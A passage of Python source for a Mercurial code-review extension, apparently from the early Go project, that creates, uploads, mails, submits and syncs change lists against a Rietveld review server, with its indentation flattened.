s += "\tReviewer: " + JoinComma(cl.reviewer) + "\n"
s += "\tCC: " + JoinComma(cl.cc) + "\n"
s += "\tFiles:\n"
for f in cl.files:
s += "\t\t" + f + "\n"
return s
def Flush(self, ui, repo):
if self.name == "new":
self.Upload(ui, repo, gofmt_just_warn=True)
dir = CodeReviewDir(ui, repo)
path = dir + '/cl.' + self.name
f = open(path+'!', "w")
f.write(self.DiskText())
f.close()
os.rename(path+'!', path)
if self.web and not self.original_author:
EditDesc(self.name, desc=self.desc,
reviewers=JoinComma(self.reviewer), cc=JoinComma(self.cc))
def Delete(self, ui, repo):
dir = CodeReviewDir(ui, repo)
os.unlink(dir + "/cl." + self.name)
def Subject(self):
s = line1(self.desc)
if len(s) > 60:
s = s[0:55] + "..."
if self.name != "new":
s = "code review %s: %s" % (self.name, s)
return s
def Upload(self, ui, repo, send_mail=False, gofmt=True, gofmt_just_warn=False):
if ui.configbool("codereview", "force_gofmt", True) and gofmt:
CheckGofmt(ui, repo, self.files, just_warn=gofmt_just_warn)
os.chdir(repo.root)
form_fields = [
("content_upload", "1"),
("reviewers", JoinComma(self.reviewer)),
("cc", JoinComma(self.cc)),
("description", self.desc),
("base_hashes", ""),
# Would prefer not to change the subject
# on reupload, but /upload requires it.
("subject", self.Subject()),
]
# NOTE(rsc): This duplicates too much of RealMain,
# but RealMain doesn't have the most reusable interface.
if self.name != "new":
form_fields.append(("issue", self.name))
vcs = GuessVCS(upload_options)
data = vcs.GenerateDiff(self.files)
files = vcs.GetBaseFiles(data)
if len(data) > MAX_UPLOAD_SIZE:
uploaded_diff_file = []
form_fields.append(("separate_patches", "1"))
else:
uploaded_diff_file = [("data", "data.diff", data)]
ctype, body = EncodeMultipartFormData(form_fields, uploaded_diff_file)
response_body = MySend("/upload", body, content_type=ctype)
patchset = None
msg = response_body
lines = msg.splitlines()
if len(lines) >= 2:
msg = lines[0]
patchset = lines[1].strip()
patches = [x.split(" ", 1) for x in lines[2:]]
ui.status(msg + "\n")
if not response_body.startswith("Issue created.") and not response_body.startswith("Issue updated."):
raise util.Abort("failed to update issue: " + response_body)
issue = msg[msg.rfind("/")+1:]
self.name = issue
if not self.url:
self.url = server_url_base + self.name
if not uploaded_diff_file:
patches = UploadSeparatePatches(issue, rpc, patchset, data, upload_options)
vcs.UploadBaseFiles(issue, rpc, patches, patchset, upload_options, files)
if send_mail:
MySend("/" + issue + "/mail", payload="")
self.web = True
self.Flush(ui, repo)
return
def GoodCLName(name):
return re.match("^[0-9]+$", name)
def ParseCL(text, name):
sname = None
lineno = 0
sections = {
'Author': '',
'Description': '',
'Files': '',
'URL': '',
'Reviewer': '',
'CC': '',
}
for line in text.split('\n'):
lineno += 1
line = line.rstrip()
if line != '' and line[0] == '#':
continue
if line == '' or line[0] == ' ' or line[0] == '\t':
if sname == None and line != '':
return None, lineno, 'text outside section'
if sname != None:
sections[sname] += line + '\n'
continue
p = line.find(':')
if p >= 0:
s, val = line[:p].strip(), line[p+1:].strip()
if s in sections:
sname = s
if val != '':
sections[sname] += val + '\n'
continue
return None, lineno, 'malformed section header'
for k in sections:
sections[k] = StripCommon(sections[k]).rstrip()
cl = CL(name)
if sections['Author']:
cl.original_author = sections['Author']
cl.desc = sections['Description']
for line in sections['Files'].split('\n'):
i = line.find('#')
if i >= 0:
line = line[0:i].rstrip()
if line == '':
continue
cl.files.append(line)
cl.reviewer = SplitCommaSpace(sections['Reviewer'])
cl.cc = SplitCommaSpace(sections['CC'])
cl.url = sections['URL']
if cl.desc == '<enter description here>':
cl.desc = '';
return cl, 0, ''
def SplitCommaSpace(s):
return s.replace(",", " ").split()
def CutDomain(s):
i = s.find('@')
if i >= 0:
s = s[0:i]
return s
def JoinComma(l):
return ", ".join(l)
def ExceptionDetail():
s = str(sys.exc_info()[0])
if s.startswith("<type '") and s.endswith("'>"):
s = s[7:-2]
elif s.startswith("<class '") and s.endswith("'>"):
s = s[8:-2]
arg = str(sys.exc_info()[1])
if len(arg) > 0:
s += ": " + arg
return s
def IsLocalCL(ui, repo, name):
return GoodCLName(name) and os.access(CodeReviewDir(ui, repo) + "/cl." + name, 0)
# Load CL from disk and/or the web.
def LoadCL(ui, repo, name, web=True):
if not GoodCLName(name):
return None, "invalid CL name"
dir = CodeReviewDir(ui, repo)
path = dir + "cl." + name
if os.access(path, 0):
ff = open(path)
text = ff.read()
ff.close()
cl, lineno, err = ParseCL(text, name)
if err != "":
return None, "malformed CL data: "+err
cl.local = True
else:
cl = CL(name)
if web:
try:
f = GetSettings(name)
except:
return None, "cannot load CL %s from code review server: %s" % (name, ExceptionDetail())
if 'reviewers' not in f:
return None, "malformed response loading CL data from code review server"
cl.reviewer = SplitCommaSpace(f['reviewers'])
cl.cc = SplitCommaSpace(f['cc'])
cl.desc = f['description']
cl.url = server_url_base + name
cl.web = True
return cl, ''
class LoadCLThread(threading.Thread):
def __init__(self, ui, repo, dir, f, web):
threading.Thread.__init__(self)
self.ui = ui
self.repo = repo
self.dir = dir
self.f = f
self.web = web
self.cl = None
def run(self):
cl, err = LoadCL(self.ui, self.repo, self.f[3:], web=self.web)
if err != '':
self.ui.warn("loading "+self.dir+self.f+": " + err + "\n")
return
self.cl = cl
# Load all the CLs from this repository.
def LoadAllCL(ui, repo, web=True):
dir = CodeReviewDir(ui, repo)
m = {}
files = [f for f in os.listdir(dir) if f.startswith('cl.')]
if not files:
return m
active = []
first = True
for f in files:
t = LoadCLThread(ui, repo, dir, f, web)
t.start()
if web and first:
# first request: wait in case it needs to authenticate
# otherwise we get lots of user/password prompts
# running in parallel.
t.join()
if t.cl:
m[t.cl.name] = t.cl
first = False
else:
active.append(t)
for t in active:
t.join()
if t.cl:
m[t.cl.name] = t.cl
return m
# Find repository root. On error, ui.warn and return None
def RepoDir(ui, repo):
url = repo.url();
if not url.startswith('file:/'):
ui.warn("repository %s is not in local file system\n" % (url,))
return None
url = url[5:]
if url.endswith('/'):
url = url[:-1]
return url
# Find (or make) code review directory. On error, ui.warn and return None
def CodeReviewDir(ui, repo):
dir = RepoDir(ui, repo)
if dir == None:
return None
dir += '/.hg/codereview/'
if not os.path.isdir(dir):
try:
os.mkdir(dir, 0700)
except:
ui.warn('cannot mkdir %s: %s\n' % (dir, ExceptionDetail()))
return None
return dir
# Strip maximal common leading white space prefix from text
def StripCommon(text):
ws = None
for line in text.split('\n'):
line = line.rstrip()
if line == '':
continue
white = line[:len(line)-len(line.lstrip())]
if ws == None:
ws = white
else:
common = ''
for i in range(min(len(white), len(ws))+1):
if white[0:i] == ws[0:i]:
common = white[0:i]
ws = common
if ws == '':
break
if ws == None:
return text
t = ''
for line in text.split('\n'):
line = line.rstrip()
if line.startswith(ws):
line = line[len(ws):]
if line == '' and t == '':
continue
t += line + '\n'
while len(t) >= 2 and t[-2:] == '\n\n':
t = t[:-1]
return t
# Indent text with indent.
def Indent(text, indent):
t = ''
for line in text.split('\n'):
t += indent + line + '\n'
return t
# Return the first line of l
def line1(text):
return text.split('\n')[0]
_change_prolog = """# Change list.
# Lines beginning with # are ignored.
# Multi-line values should be indented.
"""
#######################################################################
# Mercurial helper functions
# Return list of changed files in repository that match pats.
def ChangedFiles(ui, repo, pats, opts):
# Find list of files being operated on.
matcher = cmdutil.match(repo, pats, opts)
node1, node2 = cmdutil.revpair(repo, None)
modified, added, removed = repo.status(node1, node2, matcher)[:3]
l = modified + added + removed
l.sort()
return l
# Return list of changed files in repository that match pats and still exist.
def ChangedExistingFiles(ui, repo, pats, opts):
matcher = cmdutil.match(repo, pats, opts)
node1, node2 = cmdutil.revpair(repo, None)
modified, added, _ = repo.status(node1, node2, matcher)[:3]
l = modified + added
l.sort()
return l
# Return list of files claimed by existing CLs
def TakenFiles(ui, repo):
return Taken(ui, repo).keys()
def Taken(ui, repo):
all = LoadAllCL(ui, repo, web=False)
taken = {}
for _, cl in all.items():
for f in cl.files:
taken[f] = cl
return taken
# Return list of changed files that are not claimed by other CLs
def DefaultFiles(ui, repo, pats, opts):
return Sub(ChangedFiles(ui, repo, pats, opts), TakenFiles(ui, repo))
def Sub(l1, l2):
return [l for l in l1 if l not in l2]
def Add(l1, l2):
l = l1 + Sub(l2, l1)
l.sort()
return l
def Intersect(l1, l2):
return [l for l in l1 if l in l2]
def getremote(ui, repo, opts):
# save $http_proxy; creating the HTTP repo object will
# delete it in an attempt to "help"
proxy = os.environ.get('http_proxy')
source, _, _ = hg.parseurl(ui.expandpath("default"), None)
other = hg.repository(cmdutil.remoteui(repo, opts), source)
if proxy is not None:
os.environ['http_proxy'] = proxy
return other
def Incoming(ui, repo, opts):
_, incoming, _ = repo.findcommonincoming(getremote(ui, repo, opts))
return incoming
def EditCL(ui, repo, cl):
s = cl.EditorText()
while True:
s = ui.edit(s, ui.username())
clx, line, err = ParseCL(s, cl.name)
if err != '':
if ui.prompt("error parsing change list: line %d: %s\nre-edit (y/n)?" % (line, err), ["&yes", "&no"], "y") == "n":
return "change list not modified"
continue
cl.desc = clx.desc;
cl.reviewer = clx.reviewer
cl.cc = clx.cc
cl.files = clx.files
if cl.desc == '':
if ui.prompt("change list should have description\nre-edit (y/n)?", ["&yes", "&no"], "y") != "n":
continue
break
return ""
# For use by submit, etc. (NOT by change)
# Get change list number or list of files from command line.
# If files are given, make a new change list.
def CommandLineCL(ui, repo, pats, opts):
if len(pats) > 0 and GoodCLName(pats[0]):
if len(pats) != 1:
return None, "cannot specify change number and file names"
if opts.get('message'):
return None, "cannot use -m with existing CL"
cl, err = LoadCL(ui, repo, pats[0], web=True)
if err != "":
return None, err
else:
cl = CL("new")
cl.local = True
cl.files = Sub(ChangedFiles(ui, repo, pats, opts), TakenFiles(ui, repo))
if not cl.files:
return None, "no files changed"
if opts.get('reviewer'):
cl.reviewer = Add(cl.reviewer, SplitCommaSpace(opts.get('reviewer')))
if opts.get('cc'):
cl.cc = Add(cl.cc, SplitCommaSpace(opts.get('cc')))
if cl.name == "new":
if opts.get('message'):
cl.desc = opts.get('message')
else:
err = EditCL(ui, repo, cl)
if err != '':
return None, err
return cl, ""
# reposetup replaces cmdutil.match with this wrapper,
# which expands the syntax @clnumber to mean the files
# in that CL.
original_match = None
def ReplacementForCmdutilMatch(repo, pats=[], opts={}, globbed=False, default='relpath'):
taken = []
files = []
for p in pats:
if p.startswith('@'):
taken.append(p)
clname = p[1:]
if not GoodCLName(clname):
raise util.Abort("invalid CL name " + clname)
cl, err = LoadCL(repo.ui, repo, clname, web=False)
if err != '':
raise util.Abort("loading CL " + clname + ": " + err)
files = Add(files, cl.files)
pats = Sub(pats, taken) + ['path:'+f for f in files]
return original_match(repo, pats=pats, opts=opts, globbed=globbed, default=default)
def RelativePath(path, cwd):
n = len(cwd)
if path.startswith(cwd) and path[n] == '/':
return path[n+1:]
return path
# Check that gofmt run on the list of files does not change them
def CheckGofmt(ui, repo, files, just_warn=False):
files = [f for f in files if f.startswith('src/') and f.endswith('.go')]
if not files:
return
cwd = os.getcwd()
files = [RelativePath(repo.root + '/' + f, cwd) for f in files]
try:
cmd = subprocess.Popen(["gofmt", "-l"] + files, shell=False, stdin=subprocess.PIPE, stdout=subprocess.PIPE, stderr=subprocess.PIPE, close_fds=True)
cmd.stdin.close()
except:
raise util.Abort("gofmt: " + ExceptionDetail())
data = cmd.stdout.read()
errors = cmd.stderr.read()
cmd.wait()
if len(errors) > 0:
ui.warn("gofmt errors:\n" + errors.rstrip() + "\n")
return
if len(data) > 0:
msg = "gofmt needs to format these files (run hg gofmt):\n" + Indent(data, "\t").rstrip()
if just_warn:
ui.warn("warning: " + msg + "\n")
else:
raise util.Abort(msg)
return
#######################################################################
# Mercurial commands
server = "codereview.appspot.com"
server_url_base = None
# every command must take a ui and and repo as arguments.
# opts is a dict where you can find other command line flags
#
# Other parameters are taken in order from items on the command line that
# don't start with a dash. If no default value is given in the parameter list,
# they are required.
#
def change(ui, repo, *pats, **opts):
"""create or edit a change list
Create or edit a change list.
A change list is a group of files to be reviewed and submitted together,
plus a textual description of the change.
Change lists are referred to by simple alphanumeric names.
Changes must be reviewed before they can be submitted.
In the absence of options, the change command opens the
change list for editing in the default editor.
Deleting a change with the -d or -D flag does not affect
the contents of the files listed in that change. To revert
the files listed in a change, use
hg revert @123456
before running hg change -d 123456.
"""
dirty = {}
if len(pats) > 0 and GoodCLName(pats[0]):
name = pats[0]
if len(pats) != 1:
return "cannot specify CL name and file patterns"
pats = pats[1:]
cl, err = LoadCL(ui, repo, name, web=True)
if err != '':
return err
if not cl.local and (opts["stdin"] or not opts["stdout"]):
return "cannot change non-local CL " + name
else:
name = "new"
cl = CL("new")
dirty[cl] = True
files = ChangedFiles(ui, repo, pats, opts)
taken = TakenFiles(ui, repo)
files = Sub(files, taken)
if opts["delete"] or opts["deletelocal"]:
if opts["delete"] and opts["deletelocal"]:
return "cannot use -d and -D together"
flag = "-d"
if opts["deletelocal"]:
flag = "-D"
if name == "new":
return "cannot use "+flag+" with file patterns"
if opts["stdin"] or opts["stdout"]:
return "cannot use "+flag+" with -i or -o"
if not cl.local:
return "cannot change non-local CL " + name
if opts["delete"]:
if cl.original_author:
return "original author must delete CL; hg change -D will remove locally"
PostMessage(cl.name, "*** Abandoned ***", send_mail="checked")
EditDesc(cl.name, closed="checked")
cl.Delete(ui, repo)
return
if opts["stdin"]:
s = sys.stdin.read()
clx, line, err = ParseCL(s, name)
if err != '':
return "error parsing change list: line %d: %s" % (line, err)
if clx.desc is not None:
cl.desc = clx.desc;
dirty[cl] = True
if clx.reviewer is not None:
cl.reviewer = clx.reviewer
dirty[cl] = True
if clx.cc is not None:
cl.cc = clx.cc
dirty[cl] = True
if clx.files is not None:
cl.files = clx.files
dirty[cl] = True
if not opts["stdin"] and not opts["stdout"]:
if name == "new":
cl.files = files
err = EditCL(ui, repo, cl)
if err != "":
return err
dirty[cl] = True
for d, _ in dirty.items():
d.Flush(ui, repo)
if opts["stdout"]:
ui.write(cl.EditorText())
elif name == "new":
if ui.quiet:
ui.write(cl.name)
else:
ui.write("CL created: " + cl.url + "\n")
return
def code_login(ui, repo, **opts):
"""log in to code review server
Logs in to the code review server, saving a cookie in
a file in your home directory.
"""
MySend(None)
def clpatch(ui, repo, clname, **opts):
"""import a patch from the code review server
Imports a patch from the code review server into the local client.
If the local client has already modified any of the files that the
patch modifies, this command will refuse to apply the patch.
Submitting an imported patch will keep the original author's
name as the Author: line but add your own name to a Committer: line.
"""
cl, patch, err = DownloadCL(ui, repo, clname)
argv = ["hgpatch"]
if opts["no_incoming"]:
argv += ["--checksync=false"]
if err != "":
return err
try:
cmd = subprocess.Popen(argv, shell=False, stdin=subprocess.PIPE, stdout=subprocess.PIPE, stderr=None, close_fds=True)
except:
return "hgpatch: " + ExceptionDetail()
if os.fork() == 0:
cmd.stdin.write(patch)
os._exit(0)
cmd.stdin.close()
out = cmd.stdout.read()
if cmd.wait() != 0:
return "hgpatch failed"
cl.local = True
cl.files = out.strip().split()
files = ChangedFiles(ui, repo, [], opts)
extra = Sub(cl.files, files)
if extra:
ui.warn("warning: these files were listed in the patch but not changed:\n\t" + "\n\t".join(extra) + "\n")
cl.Flush(ui, repo)
ui.write(cl.PendingText() + "\n")
def download(ui, repo, clname, **opts):
"""download a change from the code review server
Download prints a description of the given change list
followed by its diff, downloaded from the code review server.
"""
cl, patch, err = DownloadCL(ui, repo, clname)
if err != "":
return err
ui.write(cl.EditorText() + "\n")
ui.write(patch + "\n")
return
def file(ui, repo, clname, pat, *pats, **opts):
"""assign files to or remove files from a change list
Assign files to or (with -d) remove files from a change list.
The -d option only removes files from the change list.
It does not edit them or remove them from the repository.
"""
pats = tuple([pat] + list(pats))
if not GoodCLName(clname):
return "invalid CL name " + clname
dirty = {}
cl, err = LoadCL(ui, repo, clname, web=False)
if err != '':
return err
if not cl.local:
return "cannot change non-local CL " + clname
files = ChangedFiles(ui, repo, pats, opts)
if opts["delete"]:
oldfiles = Intersect(files, cl.files)
if oldfiles:
if not ui.quiet:
ui.status("# Removing files from CL. To undo:\n")
ui.status("# cd %s\n" % (repo.root))
for f in oldfiles:
ui.status("# hg file %s %s\n" % (cl.name, f))
cl.files = Sub(cl.files, oldfiles)
cl.Flush(ui, repo)
else:
ui.status("no such files in CL")
return
if not files:
return "no such modified files"
files = Sub(files, cl.files)
taken = Taken(ui, repo)
warned = False
for f in files:
if f in taken:
if not warned and not ui.quiet:
ui.status("# Taking files from other CLs. To undo:\n")
ui.status("# cd %s\n" % (repo.root))
warned = True
ocl = taken[f]
if not ui.quiet:
ui.status("# hg file %s %s\n" % (ocl.name, f))
if ocl not in dirty:
ocl.files = Sub(ocl.files, files)
dirty[ocl] = True
cl.files = Add(cl.files, files)
dirty[cl] = True
for d, _ in dirty.items():
d.Flush(ui, repo)
return
def gofmt(ui, repo, *pats, **opts):
"""apply gofmt to modified files
Applies gofmt to the modified files in the repository that match
the given patterns.
"""
files = ChangedExistingFiles(ui, repo, pats, opts)
files = [f for f in files if f.endswith(".go")]
if not files:
return "no modified go files"
cwd = os.getcwd()
files = [RelativePath(repo.root + '/' + f, cwd) for f in files]
try:
cmd = ["gofmt", "-l"]
if not opts["list"]:
cmd += ["-w"]
if os.spawnvp(os.P_WAIT, "gofmt", cmd + files) != 0:
raise util.Abort("gofmt did not exit cleanly")
except error.Abort, e:
raise
except:
raise util.Abort("gofmt: " + ExceptionDetail())
return
def mail(ui, repo, *pats, **opts):
"""mail a change for review
Uploads a patch to the code review server and then sends mail
to the reviewer and CC list asking for a review.
"""
cl, err = CommandLineCL(ui, repo, pats, opts)
if err != "":
return err
cl.Upload(ui, repo, gofmt_just_warn=True)
if not cl.reviewer:
return "no reviewers listed in CL"
pmsg = "Hello " + JoinComma(cl.reviewer)
if cl.cc:
pmsg += " (cc: %s)" % (', '.join(cl.cc),)
pmsg += ",\n"
pmsg += "\n"
pmsg += "I'd like you to review the following change.\n"
PostMessage(cl.name, pmsg, send_mail="checked", subject=cl.Subject())
def nocommit(ui, repo, *pats, **opts):
"""(disabled when using this extension)"""
return "The codereview extension is enabled; do not use commit."
def pending(ui, repo, *pats, **opts):
"""show pending changes
Lists pending changes followed by a list of unassigned but modified files.
"""
m = LoadAllCL(ui, repo, web=True)
names = m.keys()
names.sort()
for name in names:
cl = m[name]
ui.write(cl.PendingText() + "\n")
files = DefaultFiles(ui, repo, [], opts)
if len(files) > 0:
s = "Changed files not in any CL:\n"
for f in files:
s += "\t" + f + "\n"
ui.write(s)
def reposetup(ui, repo):
global original_match
if original_match is None:
original_match = cmdutil.match
cmdutil.match = ReplacementForCmdutilMatch
RietveldSetup(ui, repo)
def CheckContributor(ui, repo, user=None):
if not user:
user = ui.config("ui", "username")
if not user:
raise util.Abort("[ui] username is not configured in .hgrc")
_, userline = FindContributor(ui, repo, user, warn=False)
if not userline:
raise util.Abort("cannot find %s in CONTRIBUTORS" % (user,))
return userline
def FindContributor(ui, repo, user, warn=True):
try:
f = open(repo.root + '/CONTRIBUTORS', 'r')
except:
raise util.Abort("cannot open %s: %s" % (repo.root+'/CONTRIBUTORS', ExceptionDetail()))
for line in f.readlines():
line = line.rstrip()
if line.startswith('#'):
continue
match = re.match(r"(.*) <(.*)>", line)
if not match:
continue
if line == user or match.group(2) == user:
return match.group(2), line
if warn:
ui.warn("warning: cannot find %s in CONTRIBUTORS\n" % (user,))
return None, None
def submit(ui, repo, *pats, **opts):
"""submit change to remote repository
Submits change to remote repository.
Bails out if the local repository is not in sync with the remote one.
"""
repo.ui.quiet = True
if not opts["no_incoming"] and Incoming(ui, repo, opts):
return "local repository out of date; must sync before submit"
cl, err = CommandLineCL(ui, repo, pats, opts)
if err != "":
return err
user = None
if cl.original_author:
user = cl.original_author
userline = CheckContributor(ui, repo, user)
about = ""
if cl.reviewer:
about += "R=" + JoinComma([CutDomain(s) for s in cl.reviewer]) + "\n"
if opts.get('tbr'):
tbr = SplitCommaSpace(opts.get('tbr'))
cl.reviewer = Add(cl.reviewer, tbr)
about += "TBR=" + JoinComma([CutDomain(s) for s in tbr]) + "\n"
if cl.cc:
about += "CC=" + JoinComma([CutDomain(s) for s in cl.cc]) + "\n"
if not cl.reviewer:
return "no reviewers listed in CL"
if not cl.local:
return "cannot submit non-local CL"
# upload, to sync current patch and also get change number if CL is new.
if not cl.original_author:
cl.Upload(ui, repo, gofmt_just_warn=True)
# check gofmt for real; allowed upload to warn in order to save CL.
cl.Flush(ui, repo)
CheckGofmt(ui, repo, cl.files)
about += "%s%s\n" % (server_url_base, cl.name)
if cl.original_author:
about += "\nCommitter: " + CheckContributor(ui, repo, None) + "\n"
# submit changes locally
date = opts.get('date')
if date:
opts['date'] = util.parsedate(date)
opts['message'] = cl.desc.rstrip() + "\n\n" + about
if opts['dryrun']:
print "NOT SUBMITTING:"
print "User: ", userline
print "Message:"
print Indent(opts['message'], "\t")
print "Files:"
print Indent('\n'.join(cl.files), "\t")
return "dry run; not submitted"
m = match.exact(repo.root, repo.getcwd(), cl.files)
node = repo.commit(opts['message'], userline, opts.get('date'), m)
if not node:
return "nothing changed"
log = repo.changelog
rev = log.rev(node)
parents = log.parentrevs(rev)
if (rev-1 not in parents and
(parents == (nullrev, nullrev) or
len(log.heads(log.node(parents[0]))) > 1 and
(parents[1] == nullrev or len(log.heads(log.node(parents[1]))) > 1))):
repo.rollback()
return "local repository out of date (created new head); must sync before submit"
# push changes to remote.
# if it works, we're committed.
# if not, roll back
other = getremote(ui, repo, opts)
r = repo.push(other, False, None)
if r == 0:
repo.rollback()
return "local repository out of date; must sync before submit"
# we're committed. upload final patch, close review, add commit message
changeURL = short(node)
url = other.url()
m = re.match("^https?://([^@/]+@)?([^.]+)\.googlecode\.com/hg/", url)
if m:
changeURL = "http://code.google.com/p/%s/source/detail?r=%s" % (m.group(2), changeURL)
else:
print >>sys.stderr, "URL: ", url
pmsg = "*** Submitted as " + changeURL + " ***\n\n" + opts['message']
PostMessage(cl.name, pmsg, send_mail="checked")
if not cl.original_author:
EditDesc(cl.name, closed="checked")
cl.Delete(ui, repo)
def sync(ui, repo, **opts):
"""synchronize with remote repository
Incorporates recent changes from the remote repository
into the local repository.
"""
if not opts["local"]:
ui.status = sync_note
ui.note = sync_note
other = getremote(ui, repo, opts)
modheads = repo.pull(other)
err = commands.postincoming(ui, repo, modheads, True, "tip")
if err:
return err
sync_changes(ui, repo)
def sync_note(msg):
# we run sync (pull -u) in verbose mode to get the
# list of files being updated, but that drags along
# a bunch of messages we don't care about.
# omit them.
if msg == 'resolving manifests\n':
return
if msg == 'searching for changes\n':
return
if msg == "couldn't find merge tool hgmerge\n":
return
sys.stdout.write(msg)
def sync_changes(ui, repo):
# Look through recent change log descriptions to find
# potential references to http://.*/our-CL-number.
# Double-check them by looking at the Rietveld log.
get = util.cachefunc(lambda r: repo[r].changeset())
changeiter, matchfn = cmdutil.walkchangerevs(ui, repo, [], get, {'rev': None})
n = 0
for st, rev, fns in changeiter:
if st != 'iter':
continue
n += 1
if n > 100:
break
desc = repo[rev].description().strip()
for clname in re.findall('(?m)^http://(?:[^\n]+)/([0-9]+)$', desc):
if IsLocalCL(ui, repo, clname) and IsRietveldSubmitted(ui, clname, repo[rev].hex()):
ui.warn("CL %s submitted as %s; closing\n" % (clname, repo[rev]))
cl, err = LoadCL(ui, repo, clname, web=False)
if err != "":
ui.warn("loading CL %s: %s\n" % (clname, err))
continue
EditDesc(cl.name, closed="checked")
cl.Delete(ui, repo)
# Remove files that are not modified from the CLs in which they appear.
all = LoadAllCL(ui, repo, web=False)
changed = ChangedFiles(ui, repo, [], {})
for _, cl in all.items():
extra = Sub(cl.files, changed)
if extra:
ui.warn("Removing unmodified files from CL %s:\n" % (cl.name,))
for f in extra:
ui.warn("\t%s\n" % (f,))
cl.files = Sub(cl.files, extra)
cl.Flush(ui, repo)
if not cl.files:
ui.warn("CL %s has no files; suggest hg change -d %s\n" % (cl.name, cl.name))
return
def uisetup(ui):
if "^commit|ci" in commands.table:
commands.table["^commit|ci"] = (nocommit, [], "")
def upload(ui, repo, name, **opts):
"""upload diffs to the code review server
Uploads the current modifications for a given change to the server.
"""
repo.ui.quiet = True
cl, err = LoadCL(ui, repo, name, web=True)
if err != "":
return err
if not cl.local:
return "cannot upload non-local change"
cl.Upload(ui, repo)
print "%s%s\n" % (server_url_base, cl.name)
return
review_opts = [
('r', 'reviewer', '', 'add reviewer'),
('', 'cc', '', 'add cc'),
('', 'tbr', '', 'add future reviewer'),
('m', 'message', '', 'change description (for new change)'),
]
cmdtable = {
# The ^ means to show this command in the help text that
# is printed when running hg with no arguments.
"^change": (
change,
[
('d', 'delete', None, 'delete existing change list'),
('D', 'deletelocal', None, 'delete locally, but do not change CL on server'),
('i', 'stdin', None, 'read change list from standard input'),
('o', 'stdout', None, 'print change list to standard output'),
],
"[-d | -D] [-i] [-o] change# or FILE ..."
),
"^clpatch": (
clpatch,
[
('', 'no_incoming', None, 'disable check for incoming changes'),
],
"change#"
),
# Would prefer to call this codereview-login, but then
# hg help codereview prints the help for this command
# instead of the help for the extension.
"code-login": (
code_login,
[],
"",
),
"commit|ci": (
nocommit,
[],
"",
),
"^download": (
download,
[],
"change#"
),
"^file": (
file,
[
('d', 'delete', None, 'delete files from change list (but not repository)'),
],
"[-d] change# FILE ..."
),
"^gofmt": (
gofmt,
[
('l', 'list', None, 'list files that would change, but do not edit them'),
],
"FILE ..."
),
"^pending|p": (
pending,
[],
"[FILE ...]"
),
"^mail": (
mail,
review_opts + [
] + commands.walkopts,
"[-r reviewer] [--cc cc] [change# | file ...]"
),
"^submit": (
submit,
review_opts + [
('', 'no_incoming', None, 'disable initial incoming check (for testing)'),
('n', 'dryrun', None, 'make change only locally (for testing)'),
] + commands.walkopts + commands.commitopts + commands.commitopts2,
"[-r reviewer] [--cc cc] [change# | file ...]"
),
"^sync": (
sync,
[
('', 'local', None, 'do not pull changes from remote repository')
],
"[--local]",
),
"^upload": (
upload,
[],
"change#"
),
}
#######################################################################
# Wrappers around upload.py for interacting with Rietveld
emptydiff = """Index: ~rietveld~placeholder~
===================================================================
diff --git a/~rietveld~placeholder~ b/~rietveld~placeholder~
new file mode 100644
"""
# HTML form parser
class FormParser(HTMLParser):
def __init__(self):
self.map = {}
self.curtag = None
self.curdata = None
HTMLParser.__init__(self)
def handle_starttag(self, tag, attrs):
if tag == "input":
key = None
value = ''
for a in attrs:
if a[0] == 'name':
key = a[1]
if a[0] == 'value':
value = a[1]
if key is not None:
self.map[key] = value
if tag == "textarea":
key = None
for a in attrs:
if a[0] == 'name':
key = a[1]
if key is not None:
self.curtag = key
self.curdata = ''
def handle_endtag(self, tag):
if tag == "textarea" and self.curtag is not None:
self.map[self.curtag] = self.curdata
self.curtag = None
self.curdata = None
def handle_charref(self, name):
self.handle_data(unichr(int(name)))
def handle_entityref(self, name):
import htmlentitydefs
if name in htmlentitydefs.entitydefs:
self.handle_data(htmlentitydefs.entitydefs[name])
else:
self.handle_data("&" + name + ";")
def handle_data(self, data):
if self.curdata is not None:
self.curdata += data
# XML parser
def XMLGet(ui, path):
try:
data = MySend(path, force_auth=False);
except:
ui.warn("XMLGet %s: %s\n" % (path, ExceptionDetail()))
return None
return ET.XML(data)
def IsRietveldSubmitted(ui, clname, hex):
feed = XMLGet(ui, "/rss/issue/" + clname)
if feed is None:
return False
for sum in feed.findall("{http://www.w3.org/2005/Atom}entry/{http://www.w3.org/2005/Atom}summary"):
text = sum.findtext("", None).strip()
m = re.match('\*\*\* Submitted as [^*]*?([0-9a-f]+) \*\*\*', text)
if m is not None and len(m.group(1)) >= 8 and hex.startswith(m.group(1)):
return True
return False
def DownloadCL(ui, repo, clname):
cl, err = LoadCL(ui, repo, clname)
if err != "":
return None, None, "error loading CL %s: %s" % (clname, ExceptionDetail())
# Grab RSS feed to learn about CL
feed = XMLGet(ui, "/rss/issue/" + clname)
if feed is None:
return None, None, "cannot download CL"
# Find most recent diff
diff = None
prefix = 'http://' + server + '/'
for link in feed.findall("{http://www.w3.org/2005/Atom}entry/{http://www.w3.org/2005/Atom}link"):
if link.get('rel') != 'alternate':
continue
text = link.get('href')
if not text.startswith(prefix) or not text.endswith('.diff'):
continue
diff = text[len(prefix)-1:]
if diff is None:
return None, None, "CL has no diff"
diffdata = MySend(diff, force_auth=False)
# Find author - first entry will be author who created CL.
nick = None
for author in feed.findall("{http://www.w3.org/2005/Atom}entry/{http://www.w3.org/2005/Atom}author/{http://www.w3.org/2005/Atom}name"):
nick = author.findtext("", None).strip()
break
if not nick:
return None, None, "CL has no author"
# The author is just a nickname: get the real email address.
try:
data = MySend("/user_popup/" + nick, force_auth=False)
except:
ui.warn("error looking up %s: %s\n" % (nick, ExceptionDetail()))
cl.original_author = nick+"@needtofix"
return cl, diffdata, ""
match = re.match(r"<b>(.*) \((.*)\)</b>", data)
if not match:
return None, None, "error looking up %s: cannot parse result %s" % (nick, repr(data))
if match.group(1) != nick and match.group(2) != nick:
return None, None, "error looking up %s: got info for %s, %s" % (nick, match.group(1), match.group(2))
email = match.group(1)
# Temporary hack until we move to the public code review server.
email1, _ = FindContributor(ui, repo, email, warn=False)
if email1 == "":
email = re.sub("@google.com$", "@golang.org", email)
# Print warning if email is not in CONTRIBUTORS file.
FindContributor(ui, repo, email)
cl.original_author = email
return cl, diffdata, ""
# Like upload.py Send but only authenticates when the
# redirect is to www.google.com/accounts. This keeps
# unnecessary redirects from happening during testing.
def MySend(request_path, payload=None,
content_type="application/octet-stream",
timeout=None, force_auth=True,
**kwargs):
"""Sends an RPC and returns the response.
Args:
request_path: The path to send the request to, eg /api/appversion/create.
payload: The body of the request, or None to send an empty request.
content_type: The Content-Type header to use.
timeout: timeout in seconds; default None i.e. no timeout.
(Note: for large requests on OS X, the timeout doesn't work right.)
